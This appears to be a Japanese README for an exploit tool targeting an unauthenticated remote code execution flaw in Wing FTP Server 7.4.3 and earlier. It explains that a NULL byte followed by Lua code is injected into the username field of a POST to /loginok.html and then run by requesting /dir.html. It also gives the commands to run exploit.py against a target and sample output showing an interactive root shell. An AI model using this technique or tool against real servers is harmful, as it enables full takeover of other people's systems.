
Wing FTP Server <= 7.4.3 における認証されていないリモートコード実行の脆弱性
Wing FTP Server <= 7.4.3 における未認証のリモートコード実行の脆弱性。ログイン時に
usernameパラメータへ注入された NULL バイトにより、Lua コードがセッションファイルに書き込まれます。その結果のセッションクッキーを使用して/dir.htmlにアクセスすると、注入されたコードが実行されます — Linux では root として、Windows では SYSTEM として実行されます。
/loginok.html への細工された POST リクエストにより、username フィールドに NULL バイトとそれに続く Lua コードが注入されます。/dir.html に GET リクエストを送信すると、注入された Lua コードが実行されます。python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
実行例:
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root